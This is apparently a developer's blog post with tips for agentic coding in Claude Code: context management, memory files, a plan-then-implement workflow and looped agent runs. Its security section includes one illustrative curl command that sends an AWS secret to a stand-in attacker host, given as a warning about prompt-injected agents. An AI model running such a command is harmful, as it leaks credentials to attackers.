Agentic Coding Data Dump
20 February, 2026
LLMs' coding capabilities have been advancing rapidly and causing massive disruption. In this post, I'll cover some non-linear data points about the current meta, with examples using Claude Code.
LLM Amnesia
LLMs are stateless. New session, new context window.
Context Engineering
Context engineering is the practice of keeping only the most relevant tokens in the context window for a given task. LLMs struggle with recall in large context windows, so strive to reset at the 40%–50% mark.
Useful cheatsheet:
- To visualize your context window, run the /context command.
- For Claude Code, you can run the /clear command to reset the context window.
- Opinionated, but I prefer to disable the /compact feature to control what gets compacted in the context window.
- Use /resume to resume a previous conversation (conversations are saved per cwd).
Set up a custom status line to view your context percentage in real time.
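In Claude Code, a custom status line is configured in settings.json; a sketch, assuming the current statusLine schema (the command receives session JSON on stdin, and the script path here is illustrative, so check the docs for the exact fields available):

```json
{
  "statusLine": {
    "type": "command",
    "command": "~/.claude/statusline.sh"
  }
}
```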
Protect Your Context
The input tokens you and your agent feed the LLM determine its performance. View your initial new-session usage percentage via the /context command. Keep it as low as possible without compromising agent enablement. Review all your memory files, MCP servers, skills, and tools to ensure they are relevant. Stale memory files could be your biggest bottleneck when trying to be productive with a coding agent. Also worth noting: because LLMs work via next-token prediction, don't argue with the model; arguing only reinforces the statistically bad behavior already in its context. Instead, create a handoff and start over.
Layered Knowledge
When creating memory files, it's better to layer knowledge around the workspace instead of cramming it all into one root CLAUDE.md file. Claude Code has a built-in feature where it lazy-loads nested CLAUDE.md files while traversing directories.
In practice, in a typical full-stack repo, this would mean defining your database migration patterns and naming conventions at packages/backend/../db/migrations/CLAUDE.md rather than in the root of the project.
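For illustration, such a nested file might look like this (the contents are hypothetical):

```markdown
# db/migrations conventions

- Name migrations `YYYYMMDDHHMM__verb_object.sql`.
- Never edit a migration that has already been applied; add a new one instead.
- Every migration ships with a matching rollback script.
```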
Write these files yourself rather than auto-generating them; here's a good guide on writing a solid CLAUDE.md. Be sure to keep them updated. There is a skill for that.
Security
Agents cannot be trusted, and LLMs are vulnerable to prompt injections. Sandboxing them in an isolated dev environment helps mitigate system risks, but as long as a compromised agent has internet access, it can run malicious commands (such as curl www.attacker.com/steal?q=aws_secret=0HNOTHI5I5BAD) and you are pwned. Be warned: the dev machine is an attack surface.
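One sketch of that isolation, assuming a Dev Container setup: disable container networking entirely (the image name is illustrative). Note that this also blocks package installs and web research, which is why many setups use an egress allow-list firewall or proxy instead of a full network cut:

```json
{
  "image": "mcr.microsoft.com/devcontainers/base:ubuntu",
  "runArgs": ["--network=none"]
}
```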
ERPI - Epic, Research, Plan, Implement Methodology
Epic
The initial prompt. Voice record, transcribe, or write down a specification of what you want to achieve. Avoid ambiguity. This step is your highest leverage point, so put in the effort. Ask for push-back on decisions. Tools like Wispr Flow are nice, but for a while I was just voice recording on WhatsApp and transcribing the .ogg files to text.
Research
Send a coding agent to explore and research the current codebase and relevant documentation. Review and validate the output. Research should represent the state of the current codebase, not implementation suggestions. To avoid the latter, generate a list of research questions based on the initial epic.md and send the agent off to research without any context of "why" it is researching.
Plan
The implementation plan is generated by combining research_output.md and epic.md. Review and refine it so it aligns with your mental model of how the system should work and evolve. Unused features create unnecessary complexity. Remember YAGNI while ensuring the system stays extendable, and again, ask for push-back on decisions!
Notes before the implementation step
Non-deterministic coding agents thrive with determinism. You can accidentally steer a model in the wrong direction. You cannot accidentally steer a type checker. Ask Claude "is this code good?" and it says something entirely different every time. Same model, same code. Type checkers, unit tests, and linters give the model deterministic feedback.
Time spent building tooling infrastructure compounds as a codebase grows, so it's worth investing some time to set up. Sharpen the axe.
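A deterministic gate can be as small as a shell function that runs each check in order and stops at the first failure. A minimal sketch; the real commands (type checker, linter, test runner) are project-specific, and the ones in the comment are just stand-ins:

```shell
# gate.sh (sketch): run each named check in order, stop at the first failure.
# In a real project you would call it with your own tools, e.g.:
#   gate "tsc --noEmit" "eslint ." "vitest run"
gate() {
  for check in "$@"; do
    echo "running: $check"
    $check || { echo "FAILED: $check"; return 1; }
  done
  echo "all checks passed"
}

gate true "echo lint-ok"   # demo run with stand-in commands
```

The agent runs this after every change, so bad edits fail loudly and deterministically instead of depending on the model's self-assessment.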
Implement
Once the plan is prepared and reviewed, send off the coding agent and wait for this asynchronous task to complete. To avoid permissions fatigue, run the agent in a sandboxed environment where you can let it skip permissions. If that's not possible, configure a solid set of permissions and purchase a giant enter button from China like I did.
Tips on Iterating on the Spec
Specs are contracts. When iterating over the markdown outputs, I leave XML annotations before feeding them back to the LLM to revise. I also recommend staging the previous draft with git add so you can diff-review it after changes and confirm you haven't lost critical spec information.
# Annotation example
<ant> Change ORM from Prisma to Sequelize V6 </ant>
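The stage-then-diff review loop can be sketched as a self-contained demo (the file name and contents are illustrative):

```shell
# Demo of the stage-then-diff spec review loop.
set -e
tmp=$(mktemp -d) && cd "$tmp" && git init -q
echo "ORM: Prisma" > plan.md
git add plan.md                      # snapshot the reviewed draft in the index
echo "ORM: Sequelize v6" > plan.md   # simulate the agent's revision
git diff plan.md                     # review exactly what changed since the snapshot
```

Because the draft is staged, `git diff` shows only the agent's edits, so dropped spec sections are easy to spot.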
Real Example from one of my codebases
Ralph Wiggum Loop
Agent control flow. Running coding agents in for-loops is a simple yet surprisingly effective method of managing context and completing large tasks.
Pseudo bash
max_runs=10  # safety cap so a stuck agent cannot loop forever
for ((i = 1; i <= max_runs; i++)); do
  result=$(claude -p "@prd.json @progress.txt \
    1. Pick the highest-priority unfinished feature and implement only that one. \
    2. Update the PRD and append progress to progress.txt for the next developer. \
    3. Git commit the feature. \
    If the PRD is complete, output <promise>COMPLETE</promise>.")
  echo "$result"
  if [[ "$result" == *"<promise>COMPLETE</promise>"* ]]; then
    echo "PRD complete, exiting."
    exit 0
  fi
done
Pseudo prompt
Convert my feature requirements into structured PRD items.
Each item should have: category, description, skills,
mcps, steps_to_verify, and passes: false.
Format as JSON. Be specific about acceptance criteria.
Pseudo tasks.json
[{
  "task_description": "Add dark mode button",
  "steps_to_verify": [
    "CSS mode changes",
    "Icon toggles",
    "Theme state persists across reloads"
  ],
  "passes": false
}]
Parallelism and Git Worktrees
Worktrees are a built-in Git feature that has become very popular: they let you check out multiple branches from the same repository into separate directories simultaneously, so coding agents can work on different features without stepping on each other. That's how Vibe Kanban and Cursor Agents work under the hood. Although promising, agents still need a tight feedback loop such as local dev servers and tests, which is not always trivial when running multiple agents from one machine. I attempted to solve this by building my own SDLC tool over a weekend called haflow.
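A minimal worktree demo (the paths and branch names are illustrative):

```shell
# Demo: two branches checked out side by side from one repository.
set -e
tmp=$(mktemp -d) && cd "$tmp"
git init -q repo && cd repo
git -c user.email=demo@example.com -c user.name=demo \
    commit -q --allow-empty -m "init"
git worktree add -b feature-a ../feature-a   # agent 1 works here
git worktree add -b feature-b ../feature-b   # agent 2 works here
git worktree list                            # three checkouts, one object store
```

Each directory has its own working files and index, so two agents can edit and commit in parallel without clobbering each other's checkouts.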
Closing Notes
Much of what I know comes from learning from the community and just being curious, so go out there and get your hands dirty! Run a ralph loop, write your own agent, and try new tools — but keep your setup simple and manageable, and burn all your tokens!
- Tracer bullets: Small pieces of functionality built end-to-end to validate that what you plan to do on a large scale is even possible with your approach. Read more about it here!
- MCP Bloat: MCPs can bloat the context window with unnecessary tokens. In some cases, it's better to create in-house project tools for querying data instead of relying on a prebuilt holistic MCP solution. Example: a custom /get-ticket.sh script.
- Terminal multiplexers are cool: I use tmux; here's a setup blog.
- Communication: There is a lot to learn about how we communicate with LLMs from classic technical programming books. Open one up!
- Learning tests: Code you write not to build a feature, but to prove how an external system behaves. When working with closed-source APIs, tools, or binaries, you can ask the agent to create a test to confirm behavior. Interfaces can change, so checking and committing these tests in your CI can be beneficial for critical third-party dependencies.
- Propagating assumptions: Assumptions created during research propagate through planning and implementation. A wrong assumption discovered at implementation forces you to redo everything upstream. Learning tests catch these early, when the cost of being wrong is cheap.
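A tiny learning test in shell, pinning down how GNU `sort -V` orders version strings before a release script relies on it (assumes GNU coreutils):

```shell
# Learning test: confirm `sort -V` treats 1.10 as newer than 1.9.
set -e
lowest=$(printf '1.10\n1.2\n1.9\n' | sort -V | head -n 1)
[ "$lowest" = "1.2" ]
echo "confirmed: sort -V orders 1.2 before 1.9 before 1.10"
```

Commit tests like this to CI and a behavior change in the external tool surfaces as a test failure, not a mystery bug downstream.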
Link dump:
- This post's repo, reference files, and more
- Agent ping pong
- Ralph Wiggum - Geoffrey Huntley
- Agent autonomy
- Don't waste your back pressure
- Open University Grade Checker
- Simple Bash Agent
- What Is Sovereign AI? | NVIDIA Blog
- AI Hero
- BAML
- Gastown
- WebMCP
- Advanced Context Engineering for Coding Agents
- Haflow - A local fullstack webapp control panel for orchestrating containers
- Understanding LLM Inference Engines: Inside Nano-vLLM
- Vibe Kanban
- Fully automatic censorship removal for language models
- Agentic Engineering Patterns
- Large Scale Online Deanonymization
- AI Fatigue Is Real
- Kardashev Scale
- Wisprflow
- Mercury 2 - LLMs that are powered by diffusion